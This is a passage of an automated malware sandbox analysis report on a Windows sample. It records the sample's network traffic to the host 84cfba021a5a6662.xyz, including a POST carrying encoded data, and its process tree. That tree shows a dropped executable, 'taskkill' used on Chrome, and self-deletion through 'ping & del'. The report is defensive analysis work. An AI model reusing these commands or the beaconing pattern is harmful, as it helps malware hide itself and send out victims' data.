Jan 29, 2021 17:38:48.865328074 CET	267	IN	Data Raw: 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
Jan 29, 2021 17:38:48.865345955 CET	269	IN	Data Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
Jan 29, 2021 17:38:48.865360975 CET	270	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
Jan 29, 2021 17:38:48.865372896 CET	270	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 29, 2021 17:38:50.929253101 CET	280	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:50.929301977 CET	280	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 76 50 6e 4c 71 30 6a 53 62 4a 64 41 33 55 69 37 66 4d 79 72 38 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTvPnLq0jSbJdA3Ui7fMyr8~
Jan 29, 2021 17:38:50.982594967 CET	281	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3a430303779975d28f56fa479cae297c1611938330; expires=Sun, 28-Feb-21 16:38:50 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c115600001feaf425d000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iLw946OTCvV%2FKGre4D1Lw10qYGGgZ%2Fic%2F%2FD%2Bx0hox8YM5BoEh9W%2BGMzh9TfzPfOunP7rl%2FO4Uq5kA%2B9lTH8LXko2fdi%2BDPIfKL5mxLkF5V4drTcJmw%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462c88eb01fea-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta na
Jan 29, 2021 17:38:50.982636929 CET	283	IN	Data Raw: 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 Data Ascii: me="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-
Jan 29, 2021 17:38:50.982666969 CET	284	IN	Data Raw: 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f Data Ascii: olumns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by p
Jan 29, 2021 17:38:50.982695103 CET	285	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="t
Jan 29, 2021 17:38:50.982716084 CET	285	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49730	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:39:24.107032061 CET	1263	OUT	GET /info_old/ddd HTTP/1.1 Host: 84CFBA021A5A6662.xyz Accept: /
Jan 29, 2021 17:39:24.218722105 CET	1265	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:39:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d25830c08c40ffca102def47d10d59d851611938364; expires=Sun, 28-Feb-21 16:39:24 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c92f100004c5b9b35a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PzK5Mu7m3K5kCq%2BSGTJKpzkxGNnGcl2gZWoUayDxEDseCC%2BaipUH6ykDhQKqJyMHha2YAkvP9T%2BTj9AKv%2FcX2CtqylPHVQjYv6DkkKcnEf7GpNQucA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 61946397ed9e4c5b-AMS Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:39:24.218751907 CET	1266	IN	Data Raw: 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f Data Ascii: rt" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href=
Jan 29, 2021 17:39:24.218769073 CET	1267	IN	Data Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 Data Ascii: "> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending
Jan 29, 2021 17:39:24.218785048 CET	1269	IN	Data Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
Jan 29, 2021 17:39:24.218796015 CET	1269	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: N1yprTBBXs.exe PID: 6476 Parent PID: 5648

General

Start time:	17:38:33
Start date:	29/01/2021
Path:	C:\Users\user\Desktop\N1yprTBBXs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\N1yprTBBXs.exe'
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 6548 Parent PID: 6476

General

Start time:	17:38:37
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0xe80000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 6272167835D47591.exe PID: 6612 Parent PID: 6476

General

Start time:	17:38:40
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 22%, Metadefender, Browse Detection: 59%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 6640 Parent PID: 1704

General

Start time:	17:38:39
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
Imagebase:	0xe80000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 6272167835D47591.exe PID: 6684 Parent PID: 6476

General

Start time:	17:38:41
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6716 Parent PID: 6476

General

Start time:	17:38:41
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6724 Parent PID: 6716

General

Start time:	17:38:42
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 6848 Parent PID: 6716

General

Start time:	17:38:43
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x7ff797770000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: 1611970727133.exe PID: 6944 Parent PID: 6612

General

Start time:	17:38:47
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Roaming\1611970727133.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 14%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 7012 Parent PID: 6684

General

Start time:	17:38:48
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7084 Parent PID: 7012

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7100 Parent PID: 6684

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: taskkill.exe PID: 7132 Parent PID: 7012

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0x1320000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7140 Parent PID: 7100

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 5112 Parent PID: 7100

General

Start time:	17:38:51
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xe10000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ThunderFW.exe PID: 7100 Parent PID: 6612

General

Start time:	17:39:17
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0xb10000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 2%, ReversingLabs

Chronological Activities

Analysis Process: cmd.exe PID: 6096 Parent PID: 6612

General

Start time:	17:39:23
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6644 Parent PID: 6096

General

Start time:	17:39:25
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 3656 Parent PID: 6096

General

Start time:	17:39:25
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xe10000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: N1yprTBBXs.exe PID: 6476 Parent PID: 5648 N1yprTBBXs.exeCOMMON

Executed Functions

Function 004EFF70, Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3f5682d0213ff08ad4b4be0f44ab0107fa97d820c6fbcc80d2a7ce6187e720
Instruction ID: 7853bd80ffdabaee371dd3f601dc4c3f0e006d34b9f292e2572895333175450a
Opcode Fuzzy Hash: 0f3f5682d0213ff08ad4b4be0f44ab0107fa97d820c6fbcc80d2a7ce6187e720
Instruction Fuzzy Hash: D0718E357000145FCB0DED7996E07BAB7E3AB8E320F31453DEA07C374AEA699C519661

Uniqueness

Uniqueness Score: -1.00%

Function 004EFAF0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45dd3b59580f71fa971b2652676f95e27cbf64ef2304b088ebe584d7501e496
Instruction ID: 31dd317555d48ad0c04f4b570de6c7b6dbf888e0e8b9c0b7428458acb504bca7
Opcode Fuzzy Hash: c45dd3b59580f71fa971b2652676f95e27cbf64ef2304b088ebe584d7501e496
